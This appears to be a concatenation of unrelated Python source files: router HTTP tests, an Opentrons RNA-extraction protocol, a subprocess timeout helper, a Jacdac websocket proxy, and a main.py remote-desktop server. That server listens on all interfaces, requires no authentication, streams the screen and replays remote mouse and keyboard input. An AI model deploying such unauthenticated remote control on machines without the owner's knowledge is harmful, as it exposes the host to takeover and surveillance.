ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'X' * 4096),
ResponseValidator(expect_headers={"Content-Type": "text/plain;charset=utf-8"},
expect_body=b'X' * 4096)),
(RequestMsg("GET", "/GET/info_content_len",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8"},
body=b'?'),
ResponseValidator(expect_headers={'Content-Type': "text/plain;charset=utf-8"},
expect_body=b'?')),
# test support for "folded headers"
(RequestMsg("GET", "/GET/folded_header_01",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "One\r\n \r\n\tTwo"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
"folded-header":
"One \tTwo"},
expect_body=b'X')),
(RequestMsg("GET", "/GET/folded_header_02",
headers={"Content-Length": 0}),
ResponseMsg(200, reason="OK",
headers={"Content-Type": "text/plain;charset=utf-8",
"Content-Length": 1,
"folded-header": "\r\n \r\n\tTwo",
"another-header": "three"},
body=b'X'),
ResponseValidator(expect_headers={"Content-Type":
"text/plain;charset=utf-8",
# trim leading and
# trailing ws:
"folded-header":
"Two",
"another-header":
"three"},
expect_body=b'X')),
],
#
# HEAD
#
"HEAD": [
(RequestMsg("HEAD", "/HEAD/test_01",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"},
body=None),
ResponseValidator(expect_headers={"App-Header-1": "Value 01",
"Content-Length": "10",
"App-Header-2": "Value 02"})
),
(RequestMsg("HEAD", "/HEAD/test_03",
headers={"Content-Length": "0"}),
ResponseMsg(200, headers={"App-Header-3": "Value 03"}),
ResponseValidator(expect_headers={"App-Header-3": "Value 03"})),
],
#
# POST
#
"POST": [
(RequestMsg("POST", "/POST/test_01",
headers={"App-Header-1": "Value 01",
"Content-Length": "19",
"Content-Type": "application/x-www-form-urlencoded"},
body=b'one=1&two=2&three=3'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever"},
body=b'12345678abcdefghijklmno'),
ResponseValidator(expect_body=b'12345678abcdefghijklmno')
),
(RequestMsg("POST", "/POST/test_02",
headers={"App-Header-1": "Value 01",
"Content-Length": "5"},
body=b'01234'),
ResponseMsg(200, reason="OK",
headers={"Response-Header": "whatever",
"Content-Length": "9"},
body=b'Hi There!'),
ResponseValidator(expect_body=b'Hi There!')
),
],
#
# PUT
#
"PUT": [
(RequestMsg("PUT", "/PUT/test_01",
headers={"Put-Header-1": "Value 01",
"Content-Length": "513",
"Content-Type": "text/plain;charset=utf-8"},
body=b'$' * 513),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever",
"Content-length": "3"},
body=b'ABC'),
ResponseValidator(status=201, expect_body=b'ABC')
),
(RequestMsg("PUT", "/PUT/test_02",
headers={"Put-Header-1": "Value 01",
"Content-length": "0",
"Content-Type": "text/plain;charset=utf-8"}),
ResponseMsg(201, reason="Created",
headers={"Response-Header": "whatever"},
body=b'No Content Length'),
ResponseValidator(status=201, expect_body=b'No Content Length')
),
]
}
def _do_request(self, client, tests):
for req, _, val in tests:
req.send_request(client)
rsp = client.getresponse()
try:
body = val.check_response(rsp)
except Exception as exc:
self.fail("request failed: %s" % str(exc))
if req.method == "BODY":
self.assertEqual(b'', body)
def test_001_get(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["GET"])
client.close()
def test_002_head(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["HEAD"])
client.close()
def test_003_post(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["POST"])
client.close()
def test_004_put(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener11_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_11["PUT"])
client.close()
def test_006_head_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["HEAD"])
client.close()
def test_007_post_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["POST"])
client.close()
def test_008_put_10(self):
client = HTTPConnection("127.0.0.1:%s" % self.http_listener10_port,
timeout=TIMEOUT)
self._do_request(client, self.TESTS_10["PUT"])
client.close()
class Http1OneRouterTestBase(TestCase):
# HTTP/1.1 compliant test cases
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address',
{'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1OneRouterTestBase, cls).setUpClass()
cls.http_server11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1Edge2EdgeTestBase(TestCase):
@classmethod
def router(cls, name, mode, extra):
config = [
('router', {'mode': mode,
'id': name,
'allowUnsettledMulticast': 'yes'}),
('listener', {'role': 'normal',
'port': cls.tester.get_port()}),
('address', {'prefix': 'closest', 'distribution': 'closest'}),
('address', {'prefix': 'multicast', 'distribution': 'multicast'}),
]
if extra:
config.extend(extra)
config = Qdrouterd.Config(config)
cls.routers.append(cls.tester.qdrouterd(name, config, wait=True))
return cls.routers[-1]
@classmethod
def setUpClass(cls):
"""Start a router"""
super(Http1Edge2EdgeTestBase, cls).setUpClass()
cls.routers = []
cls.INTA_edge1_port = cls.tester.get_port()
cls.INTA_edge2_port = cls.tester.get_port()
cls.http_server11_port = cls.tester.get_port()
cls.http_listener11_port = cls.tester.get_port()
cls.http_server10_port = cls.tester.get_port()
cls.http_listener10_port = cls.tester.get_port()
class Http1ClientCloseTestsMixIn(object):
"""
Generic test functions for simulating HTTP/1.x client connection drops.
"""
def client_request_close_test(self, server_port, client_port, server_mgmt):
"""
Simulate an HTTP client drop while sending a very large PUT request
"""
PING = {
"GET": [
(RequestMsg("GET", "/GET/test_04_client_request_close/ping",
headers={"Content-Length": "0"}),
ResponseMsg(200, reason="OK",
headers={
"Content-Length": "19",
"Content-Type": "text/plain;charset=utf-8",
},
body=b'END OF TRANSMISSION'),
ResponseValidator(status=200)
)]
}
TESTS = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_04_client_request_close",
headers={
"Content-Length": "500000",
"Content-Type": "text/plain;charset=utf-8"
},
body=b'4' * (500000 - 19) + b'END OF TRANSMISSION'),
ResponseMsg(201, reason="Created",
headers={"Test-Header": "/PUT/test_04_client_request_close",
"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the sending of the PUT
# request
#
fake_request = b'PUT /PUT/test_04_client_request_close HTTP/1.1\r\n' \
+ b'Content-Length: 500000\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n' \
+ b'?' * 50000
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(5)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.close()
# since socket I/O is asynchronous wait until the request arrives
# at the server
expected = len(fake_request)
bytes_in = 0
while expected > bytes_in:
ri = server_mgmt.query(type="org.apache.qpid.dispatch.httpRequestInfo").get_entities()
bytes_in = ri[-1]['bytesIn'] if ri else 0 # most recent request at tail
sleep(0.1)
# now ensure the connection between the router and the HTTP server
# still functions:
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
def client_response_close_test(self, server_port, client_port):
"""
Simulate an HTTP client drop while the server is sending a very large
response message.
"""
PING = {
"PUT": [
(RequestMsg("PUT", "/PUT/test_05_client_response_close/ping",
headers={"Content-Length": "1",
"content-type":
"text/plain;charset=utf-8"},
body=b'X'),
ResponseMsg(201, reason="Created",
headers={"Content-Length": "0"}),
ResponseValidator(status=201)
)]
}
big_headers = dict([('Huge%s' % i, chr(ord(b'0') + i) * 8000)
for i in range(10)])
TESTS = {
"GET": [
(RequestMsg("GET", "/GET/test_05_client_response_close",
headers={
"Content-Length": "0",
"Content-Type": "text/plain;charset=utf-8"
}),
[ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(100, reason="Continue", headers=big_headers),
ResponseMsg(200,
reason="OK",
headers={"Content-Length": 1000000,
"Content-Type": "text/plain;charset=utf-8"},
body=b'?' * 1000000)],
ResponseValidator(status=200)
)]
}
TESTS.update(PING)
server = TestServer(server_port=server_port,
client_port=client_port,
tests=TESTS)
#
# ensure the server has fully connected
#
client = ThreadedTestClient(PING, client_port)
client.wait()
#
# Simulate an HTTP client that dies during the receipt of the
# response
#
fake_request = b'GET /GET/test_05_client_response_close HTTP/1.1\r\n' \
+ b'Content-Length: 0\r\n' \
+ b'Content-Type: text/plain;charset=utf-8\r\n' \
+ b'\r\n'
fake_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fake_client.settimeout(TIMEOUT)
fake_client.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
fake_client.connect(("127.0.0.1", client_port))
fake_client.sendall(fake_request, socket.MSG_WAITALL)
fake_client.recv(1)
fake_client.close()
#
# Verify the server is still reachable
#
client = ThreadedTestClient(PING, client_port)
client.wait()
server.wait()
|
Extração MagMax COVID - STARLAB.py
|
from opentrons.types import Point
import json
import os
import math
import threading
from time import sleep
metadata = {
'protocolName': 'USO_v6_station_b_M300_Pool_magmax',
'author': 'Nick <ndiehl@opentrons.com',
'apiLevel': '2.3'
}
NUM_SAMPLES = 96 # start with 8 samples, slowly increase to 48, then 94 (max is 64)
ELUTION_VOL = 50
STARTING_VOL = 540
WASH_VOL = 500
POOL = False
TIP_TRACK = False
PARK = True
# Definitions for deck light flashing
class CancellationToken:
def __init__(self):
self.is_continued = False
def set_true(self):
self.is_continued = True
def set_false(self):
self.is_continued = False
def turn_on_blinking_notification(hardware, pause):
while pause.is_continued:
hardware.set_lights(rails=True)
sleep(1)
hardware.set_lights(rails=False)
sleep(1)
def create_thread(ctx, cancel_token):
t1 = threading.Thread(target=turn_on_blinking_notification, args=(ctx._hw_manager.hardware, cancel_token))
t1.start()
return t1
# Start protocol
def run(ctx):
# Setup for flashing lights notification to empty trash
# cancellationToken = CancellationToken()
# load labware and pipettes
num_cols = math.ceil(NUM_SAMPLES/8)
tips300 = [ctx.load_labware('starlab_96_tiprack_300ul', slot, '200µl filtertiprack')
for slot in ['3', '6', '8', '9', '7']]
if PARK:
parkingrack = ctx.load_labware(
'starlab_96_tiprack_300ul', '10', 'empty tiprack for parking')
if POOL:
parking_spots = parkingrack.rows()[0]
else:
parking_spots = parkingrack.rows()[0][:num_cols]
else:
tips300.insert(0, ctx.load_labware('starlab_96_tiprack_300ul', '10',
'200µl filtertiprack'))
parking_spots = [None for none in range(12)]
m300 = ctx.load_instrument(
'p300_multi_gen2', 'left', tip_racks=tips300)
magdeck = ctx.load_module('magnetic module gen2', '4')
magdeck.disengage()
magheight = 6.5
magplate = magdeck.load_labware('nest_96_wellplate_2ml_deep')
# magplate = magdeck.load_labware('biorad_96_wellplate_200ul_pcr')
tempdeck = ctx.load_module('Temperature Module Gen2', '1')
flatplate = tempdeck.load_labware(
'opentrons_96_aluminumblock_nest_wellplate_100ul',)
waste = ctx.load_labware('nest_1_reservoir_195ml', '11',
'Liquid Waste').wells()[0].top()
etoh = ctx.load_labware(
'nest_1_reservoir_195ml', '2', 'EtOH reservoir').wells()[0:]
res1 = ctx.load_labware(
'nest_12_reservoir_15ml', '5', 'reagent reservoir 1')
wash1 = res1.wells()[:4]
elution_solution = res1.wells()[-1]
if POOL:
mag_samples_m = magplate.rows()[0][:num_cols] + magplate.rows()[0][8:8+math.ceil(num_cols/2)]
elution_samples_m = flatplate.rows()[0][:num_cols] + flatplate.rows()[0][8:8+math.ceil(num_cols/2)]
else:
mag_samples_m = magplate.rows()[0][:num_cols]
elution_samples_m = flatplate.rows()[0][:num_cols]
magdeck.disengage() # just in case
#tempdeck.set_temperature(20)
m300.flow_rate.aspirate = 50
m300.flow_rate.dispense = 150
m300.flow_rate.blow_out = 300
folder_path = '/data/B'
tip_file_path = folder_path + '/tip_log.json'
tip_log = {'count': {}}
if TIP_TRACK and not ctx.is_simulating():
if os.path.isfile(tip_file_path):
with open(tip_file_path) as json_file:
data = json.load(json_file)
if 'tips300' in data:
tip_log['count'][m300] = data['tips300']
else:
tip_log['count'][m300] = 0
else:
tip_log['count'][m300] = 0
else:
tip_log['count'] = {m300: 0}
tip_log['tips'] = {
m300: [tip for rack in tips300 for tip in rack.rows()[0]]}
tip_log['max'] = {m300: len(tip_log['tips'][m300])}
def pick_up(pip, loc=None):
nonlocal tip_log
if tip_log['count'][pip] == tip_log['max'][pip] and not loc:
ctx.pause('Replace ' + str(pip.max_volume) + 'µl tipracks before \
resuming.')
pip.reset_tipracks()
tip_log['count'][pip] = 0
if loc:
pip.pick_up_tip(loc)
else:
pip.pick_up_tip(tip_log['tips'][pip][tip_log['count'][pip]])
tip_log['count'][pip] += 1
switch = True
drop_count = 0
drop_threshold = 240 # number of tips trash will accommodate before prompting user to empty
def drop(pip):
nonlocal switch
nonlocal drop_count
side = 30 if switch else -18
drop_loc = ctx.loaded_labwares[12].wells()[0].top().move(
Point(x=side))
pip.drop_tip(drop_loc)
switch = not switch
drop_count += 8
if drop_count == drop_threshold:
# Setup for flashing lights notification to empty trash
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty tips from waste before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
drop_count = 0
waste_vol = 0
waste_threshold = 185000
def remove_supernatant(vol, park=False):
def waste_track(vol):
nonlocal waste_vol
if waste_vol + vol >= waste_threshold:
# Setup for flashing lights notification to empty liquid waste
# if not ctx._hw_manager.hardware.is_simulator:
# cancellationToken.set_true()
# thread = create_thread(ctx, cancellationToken)
m300.home()
ctx.pause('Please empty liquid waste (slot 11) before resuming.')
ctx.home() # home before continuing with protocol
# cancellationToken.set_false() # stop light flashing after home
# thread.join()
waste_vol = 0
waste_vol += vol
m300.flow_rate.aspirate = 30
num_trans = math.ceil(vol/200)
vol_per_trans = vol/num_trans
for m, spot in zip(mag_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
for _ in range(num_trans):
waste_track(vol_per_trans)
if m300.current_volume > 0:
m300.dispense(m300.current_volume, m.top()) # void air gap if necessary
m300.move_to(m.center())
m300.transfer(vol_per_trans, loc, waste, new_tip='never',
air_gap=10)
#m300.blow_out(waste)
m300.air_gap(10)
drop(m300)
m300.flow_rate.aspirate = 50 # mudei de 150
def wash(wash_vol, source, mix_reps, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_vol/200)
vol_per_trans = wash_vol/num_trans
wash_vol_rem = wash_vol
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
src = source[i//(12//len(source))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source
m300.air_gap(20)
m300.mix(mix_reps, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_vol_rem+40, park=park) #+40
def wash_etoh(wash_etoh_vol, source_etoh, mix_reps_etoh, park=True):
magdeck.disengage()
num_trans = math.ceil(wash_etoh_vol/200)
vol_per_trans = wash_etoh_vol/num_trans
for i, (m, spot) in enumerate(zip(mag_samples_m, parking_spots)):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
loc = m.bottom(0.5).move(Point(x=side*2.5)) # mudei de 0.5 3>2.5
src = source_etoh[i//(12//len(source_etoh))]
for n in range(num_trans):
if m300.current_volume > 0:
m300.dispense(m300.current_volume, src.top())
m300.transfer(vol_per_trans, src.bottom(0.8), m.top(), air_gap=20,
new_tip='never')
if n < num_trans - 1: # only air_gap if going back to source_etoh
m300.air_gap(20)
m300.mix(mix_reps_etoh, 150, loc)
m300.blow_out(m.top())
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
remove_supernatant(wash_etoh_vol+40, park=park) #+40
def elute(vol, park=True):
# resuspend beads in elution
for m, spot in zip(mag_samples_m, parking_spots):
side_ind = int(m.display_name.split(' ')[0][1:])
side = -1 if side_ind % 2 == 0 else 1
pick_up(m300)
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
m300.aspirate(vol, elution_solution)
m300.move_to(m.center())
m300.dispense(vol, loc)
m300.mix(10, 0.8*vol, loc)
m300.blow_out(m.bottom(5))
m300.air_gap(20)
if park:
m300.drop_tip(spot)
else:
drop(m300)
ctx.delay(minutes=5, msg='Incubating off magnet at room temperature \
for 5 minutes')
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on magnet at room temperature \
for 5 minutes')
for m, e, spot in zip(mag_samples_m, elution_samples_m, parking_spots):
if park:
pick_up(m300, spot)
else:
pick_up(m300)
side_ind = int(m.display_name.split(' ')[0][1:])
side = 1 if side_ind % 2 == 0 else -1
loc = m.bottom(0.8).move(Point(x=side*2.5)) # mudei de 0.5>0.8 3>2.5
m300.transfer(40, loc, e.bottom(5), air_gap=20, new_tip='never')
m300.blow_out(e.top(-2))
m300.air_gap(20)
m300.drop_tip()
magdeck.engage(height=magheight)
ctx.delay(minutes=5, msg='Incubating on MagDeck for 5 minutes.')
# remove initial supernatant
m300.flow_rate.aspirate = 50
remove_supernatant(STARTING_VOL, park=PARK)
wash(WASH_VOL, wash1, 15, park=PARK)
#m300.flow_rate.aspirate = 94
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
wash_etoh(WASH_VOL, etoh, 15, park=PARK)
magdeck.disengage()
ctx.delay(minutes=5, msg='Airdrying beads at room temperature for 5 \
minutes.')
m300.flow_rate.aspirate = 50
elute(ELUTION_VOL, park=PARK)
|
main.py
|
import struct
import socket
from PIL import ImageGrab
from cv2 import cv2
import numpy as np
import threading
import keyboard
import mouse
bufsize = 1024
host = ('0.0.0.0', 80)
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.bind(host)
soc.listen(1)
# 压缩比 1-100 数值越小,压缩比越高,图片质量损失越严重
IMQUALITY = 50
lock = threading.Lock()
official_virtual_keys = {
0x08: 'backspace',
0x09: 'tab',
0x0c: 'clear',
0x0d: 'enter',
0x10: 'shift',
0x11: 'ctrl',
0x12: 'alt',
0x13: 'pause',
0x14: 'caps lock',
0x15: 'ime kana mode',
0x15: 'ime hanguel mode',
0x15: 'ime hangul mode',
0x17: 'ime junja mode',
0x18: 'ime final mode',
0x19: 'ime hanja mode',
0x19: 'ime kanji mode',
0x1b: 'esc',
0x1c: 'ime convert',
0x1d: 'ime nonconvert',
0x1e: 'ime accept',
0x1f: 'ime mode change request',
0x20: 'spacebar',
0x21: 'page up',
0x22: 'page down',
0x23: 'end',
0x24: 'home',
0x25: 'left',
0x26: 'up',
0x27: 'right',
0x28: 'down',
0x29: 'select',
0x2a: 'print',
0x2b: 'execute',
0x2c: 'print screen',
0x2d: 'insert',
0x2e: 'delete',
0x2f: 'help',
0x30: '0',
0x31: '1',
0x32: '2',
0x33: '3',
0x34: '4',
0x35: '5',
0x36: '6',
0x37: '7',
0x38: '8',
0x39: '9',
0x41: 'a',
0x42: 'b',
0x43: 'c',
0x44: 'd',
0x45: 'e',
0x46: 'f',
0x47: 'g',
0x48: 'h',
0x49: 'i',
0x4a: 'j',
0x4b: 'k',
0x4c: 'l',
0x4d: 'm',
0x4e: 'n',
0x4f: 'o',
0x50: 'p',
0x51: 'q',
0x52: 'r',
0x53: 's',
0x54: 't',
0x55: 'u',
0x56: 'v',
0x57: 'w',
0x58: 'x',
0x59: 'y',
0x5a: 'z',
0x5b: 'left windows',
0x5c: 'right windows',
0x5d: 'applications',
0x5f: 'sleep',
0x60: '0',
0x61: '1',
0x62: '2',
0x63: '3',
0x64: '4',
0x65: '5',
0x66: '6',
0x67: '7',
0x68: '8',
0x69: '9',
0x6a: '*',
0x6b: '=',
0x6c: 'separator',
0x6d: '-',
0x6e: 'decimal',
0x6f: '/',
0x70: 'f1',
0x71: 'f2',
0x72: 'f3',
0x73: 'f4',
0x74: 'f5',
0x75: 'f6',
0x76: 'f7',
0x77: 'f8',
0x78: 'f9',
0x79: 'f10',
0x7a: 'f11',
0x7b: 'f12',
0x7c: 'f13',
0x7d: 'f14',
0x7e: 'f15',
0x7f: 'f16',
0x80: 'f17',
0x81: 'f18',
0x82: 'f19',
0x83: 'f20',
0x84: 'f21',
0x85: 'f22',
0x86: 'f23',
0x87: 'f24',
0x90: 'num lock',
0x91: 'scroll lock',
0xa0: 'left shift',
0xa1: 'right shift',
0xa2: 'left ctrl',
0xa3: 'right ctrl',
0xa4: 'left menu',
0xa5: 'right menu',
0xa6: 'browser back',
0xa7: 'browser forward',
0xa8: 'browser refresh',
0xa9: 'browser stop',
0xaa: 'browser search key',
0xab: 'browser favorites',
0xac: 'browser start and home',
0xad: 'volume mute',
0xae: 'volume down',
0xaf: 'volume up',
0xb0: 'next track',
0xb1: 'previous track',
0xb2: 'stop media',
0xb3: 'play/pause media',
0xb4: 'start mail',
0xb5: 'select media',
0xb6: 'start application 1',
0xb7: 'start application 2',
0xbb: '+',
0xbc: ',',
0xbd: '-',
0xbe: '.',
0xe5: 'ime process',
0xf6: 'attn',
0xf7: 'crsel',
0xf8: 'exsel',
0xf9: 'erase eof',
0xfa: 'play',
0xfb: 'zoom',
0xfc: 'reserved ',
0xfd: 'pa1',
0xfe: 'clear',
0xba: ';',
0xde: '\'',
0xdb: '[',
0xdd: ']',
0xbf: '/',
0xc0: '`',
0xdc: '\\',
}
def ctrl(conn):
'''
读取控制命令,并在本机还原操作
'''
def Op(key, op, ox, oy):
# print(key, op, ox, oy)
if key == 1:
if op == 100:
# 左键按下
mouse.move(ox, oy)
mouse.press(button=mouse.LEFT)
elif op == 117:
# 左键弹起
x, y = mouse.get_position()
if ox != x or oy != y:
if not mouse.is_pressed():
mouse.press(button=mouse.LEFT)
mouse.move(ox, oy)
mouse.release(button=mouse.LEFT)
elif key == 2:
# 滚轮事件
if op == 0:
# 向上
mouse.move(ox, oy)
mouse.wheel(delta=-1)
else:
# 向下
mouse.move(ox, oy)
mouse.wheel(delta=1)
elif key == 3:
# 鼠标右键
if op == 100:
# 右键按下
mouse.move(ox, oy)
mouse.press(button=mouse.RIGHT)
elif op == 117:
# 右键弹起
mouse.move(ox, oy)
mouse.release(button=mouse.RIGHT)
else:
k = official_virtual_keys.get(key)
if k is not None:
if op == 100:
keyboard.press(k)
elif op == 117:
keyboard.release(k)
try:
base_len = 6
while True:
cmd = b''
rest = base_len - 0
while rest > 0:
cmd += conn.recv(rest)
rest -= len(cmd)
key = cmd[0]
op = cmd[1]
x = struct.unpack('>H', cmd[2:4])[0]
y = struct.unpack('>H', cmd[4:6])[0]
Op(key, op, x, y)
except:
return
# 压缩后np图像
img = None
# 编码后的图像
imbyt = None
def handle(conn):
global img, imbyt
lock.acquire()
if imbyt is None:
imorg = np.asarray(ImageGrab.grab())
_, imbyt= cv2.imencode(".jpg", imorg, [cv2.IMWRITE_JPEG_QUALITY,IMQUALITY])
imnp = np.asarray(imbyt, np.uint8)
img = cv2.imdecode(imnp, cv2.IMREAD_COLOR)
lock.release()
lenb = struct.pack(">BI", 1, len(imbyt))
conn.sendall(lenb)
conn.sendall(imbyt)
while True:
cv2.waitKey(100)
gb = ImageGrab.grab()
imgnpn = np.asarray(gb)
_, timbyt= cv2.imencode(".jpg", imgnpn, [cv2.IMWRITE_JPEG_QUALITY,IMQUALITY])
imnp = np.asarray(timbyt, np.uint8)
imgnew = cv2.imdecode(imnp, cv2.IMREAD_COLOR)
# 计算图像差值
imgs = imgnew - img
if (imgs!=0).any():
# 画质改变
pass
else:
continue
imbyt = timbyt
img = imgnew
# 无损压缩
_, imb = cv2.imencode(".png", imgs)
l1 = len(imbyt) # 原图像大小
l2 = len(imb) # 差异图像大小
if l1 > l2:
# 传差异化图像
lenb = struct.pack(">BI", 0, l2)
conn.sendall(lenb)
conn.sendall(imb)
else:
# 传原编码图像
lenb = struct.pack(">BI", 1, l1)
conn.sendall(lenb)
conn.sendall(imbyt)
while True:
conn, addr = soc.accept()
threading.Thread(target=handle, args=(conn,)).start()
threading.Thread(target=ctrl, args=(conn,)).start()
|
subprocess.py
|
# coding: utf-8
"""
Calling shell processes.
"""
import shlex
import threading
import traceback
from subprocess import Popen, PIPE
from .string import is_string
__author__ = 'Matteo Giantomass'
__copyright__ = "Copyright 2014, The Materials Virtual Lab"
__version__ = '0.1'
__maintainer__ = 'Matteo Giantomassi'
__email__ = 'gmatteo@gmail.com'
__date__ = '10/26/14'
class Command:
"""
Enables to run subprocess commands in a different thread with TIMEOUT
option.
Based on jcollado's solution:
http://stackoverflow.com/questions/1191374/subprocess-with-timeout/4825933#4825933
and
https://gist.github.com/kirpit/1306188
.. attribute:: retcode
Return code of the subprocess
.. attribute:: killed
True if subprocess has been killed due to the timeout
.. attribute:: output
stdout of the subprocess
.. attribute:: error
stderr of the subprocess
Example:
com = Command("sleep 1").run(timeout=2)
print(com.retcode, com.killed, com.output, com.output)
"""
def __init__(self, command):
"""
:param command: Command to execute
"""
if is_string(command):
command = shlex.split(command)
self.command = command
self.process = None
self.retcode = None
self.output, self.error = '', ''
self.killed = False
def __str__(self):
return "command: %s, retcode: %s" % (self.command, self.retcode)
def run(self, timeout=None, **kwargs):
"""
Run a command in a separated thread and wait timeout seconds.
kwargs are keyword arguments passed to Popen.
Return: self
"""
def target(**kw):
try:
# print('Thread started')
self.process = Popen(self.command, **kw)
self.output, self.error = self.process.communicate()
self.retcode = self.process.returncode
# print('Thread stopped')
except Exception:
self.error = traceback.format_exc()
self.retcode = -1
# default stdout and stderr
if 'stdout' not in kwargs:
kwargs['stdout'] = PIPE
if 'stderr' not in kwargs:
kwargs['stderr'] = PIPE
# thread
thread = threading.Thread(target=target, kwargs=kwargs)
thread.start()
thread.join(timeout)
if thread.is_alive():
# print("Terminating process")
self.process.terminate()
self.killed = True
thread.join()
return self
|
devtools.py
|
# pyright: reportGeneralTypeIssues=false
from asyncio import get_event_loop
from websockets import serve
from http.server import BaseHTTPRequestHandler, HTTPServer
from requests import get
from threading import Thread
from sys import argv
print("Jacdac DevTools (Python)")
internet = "--internet" in argv
HOST = '0.0.0.0' if internet else 'localhost'
WS_PORT = 8081
HTTP_PORT = 8082
clients = []
proxy_source: bytes
if internet:
print("WARNING: server bound to all network interfaces")
else:
print("use --internet to bind server to all network interfaces")
class Handler(BaseHTTPRequestHandler) :
def do_HEAD(self):
self.send_response(200)
def do_GET(self) :
if self.path == "/":
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Cache-Control', 'no-cache')
self.send_header("Content-Length", str(len(proxy_source)))
self.end_headers()
self.wfile.write(proxy_source)
else:
self.send_error(404)
async def proxy(websocket, path: str):
clients.append(websocket)
print("client connected (%d clients)" % len(clients))
## listen to websocket client until it closesw
try:
while websocket.open:
frame: bytes = await websocket.recv()
if len(frame) == 0:
continue
# dispatch to other clients
cs = clients.copy() # avoid races
for client in cs:
if client != websocket:
try:
await client.send(frame)
except:
print("client receive error")
except:
print("client receive error")
finally:
# remove from clients
clients.remove(websocket)
print("client disconnected (%d clients)" % len(clients))
# get proxy source
resp = get('https://microsoft.github.io/jacdac-docs/devtools/proxy')
if not resp.ok:
raise RuntimeError("proxy download failed")
proxy_source = resp.text.encode('utf-8')
def web():
print("local web: http://" + HOST + ":" + str(HTTP_PORT))
http_server = HTTPServer( (HOST, HTTP_PORT), Handler )
http_server.serve_forever()
def ws():
# start web socket server
print("websockets: ws://" + HOST + ":" + str(WS_PORT))
ws_server = serve(proxy, HOST, WS_PORT)
get_event_loop().run_until_complete(ws_server)
get_event_loop().run_forever()
# start http server
thread = Thread(target = web)
thread.daemon = True
thread.start()
# start http server
ws()
|
device.py
|
